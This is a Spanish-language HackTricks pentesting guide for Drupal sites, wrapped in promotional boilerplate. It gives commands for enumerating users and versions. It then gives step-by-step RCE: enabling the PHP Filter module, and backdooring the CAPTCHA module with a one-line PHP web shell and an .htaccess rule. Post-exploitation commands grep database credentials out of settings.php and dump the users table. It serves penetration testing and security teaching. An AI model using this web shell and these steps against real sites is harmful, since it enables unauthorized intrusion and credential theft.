hacktricks/network-services-pentesting/pentesting-web/drupal.md

# Drupal

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Descubrimiento

* Verifica **meta**
```bash
curl https://www.drupal.org/ | grep 'content="Drupal'
```
* **Node**: Drupal **indexa su contenido usando nodos**. Un nodo puede **contener cualquier cosa** como una entrada de blog, encuesta, artículo, etc. Las URI de las páginas suelen tener la forma `/node/<nodeid>`.
```bash
curl drupal-site.com/node/1
```
## Enumeración

Drupal soporta **tres tipos de usuarios** por defecto:

1. **`Administrator`**: Este usuario tiene control completo sobre el sitio web de Drupal.
2. **`Authenticated User`**: Estos usuarios pueden iniciar sesión en el sitio web y realizar operaciones como añadir y editar artículos basados en sus permisos.
3. **`Anonymous`**: Todos los visitantes del sitio web son designados como anónimos. Por defecto, a estos usuarios solo se les permite leer publicaciones.

### Versión

* Verificar `/CHANGELOG.txt`
```bash
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""

Drupal 7.57, 2018-02-21
```
{% hint style="info" %}
Las instalaciones más recientes de Drupal por defecto bloquean el acceso a los archivos `CHANGELOG.txt` y `README.txt`.
{% endhint %}

### Enumeración de nombres de usuario

#### Registro

En _/user/register_ solo intenta crear un nombre de usuario y si el nombre ya está tomado se notificará:

![](<../../.gitbook/assets/image (254).png>)

#### Solicitar nueva contraseña

Si solicitas una nueva contraseña para un nombre de usuario existente:

![](<../../.gitbook/assets/image (255).png>)

Si solicitas una nueva contraseña para un nombre de usuario inexistente:

![](<../../.gitbook/assets/image (256).png>)

### Obtener número de usuarios

Accediendo a _/user/\<number>_ puedes ver el número de usuarios existentes, en este caso es 2 ya que _/users/3_ devuelve un error de no encontrado:

![](<../../.gitbook/assets/image (257).png>)

![](<../../.gitbook/assets/image (227) (1) (1).png>)

### Páginas ocultas

**Fuzz `/node/$` donde `$` es un número** (de 1 a 500 por ejemplo).\
Podrías encontrar **páginas ocultas** (test, dev) que no están referenciadas por los motores de búsqueda.

#### Información de módulos instalados
```bash
#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml

# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml
```
### Automático
```bash
droopescan scan drupal -u http://drupal-site.local
```
## RCE

### Con el Módulo PHP Filter

{% hint style="warning" %}
En versiones anteriores de Drupal **(antes de la versión 8)**, era posible iniciar sesión como administrador y **habilitar el módulo `PHP filter`**, que "Permite que se evalúen fragmentos/códigos PHP incrustados."
{% endhint %}

Necesitas que el **plugin php esté instalado** (compruébalo accediendo a _/modules/php_ y si devuelve un **403** entonces, **existe**, si **no se encuentra**, entonces el **plugin php no está instalado**)

Ve a _Modules_ -> (**Marca**) _PHP Filter_ -> _Guardar configuración_

![](<../../.gitbook/assets/image (247) (1).png>)

Luego haz clic en _Añadir contenido_ -> Selecciona _Página básica_ o _Artículo_ -> Escribe _shellcode php en el cuerpo_ -> Selecciona _Código PHP_ en _Formato de texto_ -> Selecciona _Vista previa_

![](<../../.gitbook/assets/image (253) (1).png>)

Finalmente, solo accede al nodo recién creado:
```bash
curl http://drupal-site.local/node/3
```
### Instalar el Módulo PHP Filter

A partir de la versión **8 en adelante, el** [**módulo PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **no está instalado por defecto**. Para aprovechar esta funcionalidad, tendríamos que **instalar el módulo nosotros mismos**.

1. Descarga la versión más reciente del módulo desde el sitio web de Drupal.
1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
2. Una vez descargado, ve a **`Administración`** > **`Informes`** > **`Actualizaciones disponibles`**.
3. Haz clic en **`Examinar`**`,` selecciona el archivo desde el directorio donde lo descargamos y luego haz clic en **`Instalar`**.
4. Una vez instalado el módulo, podemos hacer clic en **`Contenido`** y **crear una nueva página básica**, de manera similar a como lo hicimos en el ejemplo de Drupal 7. De nuevo, asegúrate de **seleccionar `Código PHP` del desplegable `Formato de texto`**.

### Módulo con puerta trasera

Se puede crear un módulo con puerta trasera **añadiendo un shell a un módulo existente**. Los módulos se pueden encontrar en el sitio web drupal.org. Escojamos un módulo como [CAPTCHA](https://www.drupal.org/project/captcha). Desplázate hacia abajo y copia el enlace para el archivo tar.gz [archivo](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).

* Descarga el archivo y extrae su contenido.
```
wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
```
* Crea una **PHP web shell** con el contenido:
```php
<?php
system($_GET["cmd"]);
?>
```
* A continuación, necesitamos crear un archivo **`.htaccess`** para darnos acceso a la carpeta. Esto es necesario ya que Drupal niega el acceso directo a la carpeta **`/modules`**.
```html
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
```
* La configuración anterior aplicará reglas para la carpeta / cuando solicitemos un archivo en /modules. Copia ambos archivos a la carpeta captcha y crea un archivo.
```bash
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
```
* Suponiendo que tenemos **acceso administrativo** al sitio web, haz clic en **`Manage`** y luego en **`Extend`** en la barra lateral. A continuación, haz clic en el botón **`+ Install new module`** y seremos llevados a la página de instalación, como `http://drupal-site.local/admin/modules/install` Navega hasta el archivo comprimido del Captcha con puerta trasera y haz clic en **`Install`**.
* Una vez que la instalación tenga éxito, navega a **`/modules/captcha/shell.php`** para ejecutar comandos.

## Post Explotación

### Leer settings.php
```
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
```
### Volcar usuarios de la DB
```
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
```
## Referencias

* [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)

<details>

<summary><strong>Aprende a hackear AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>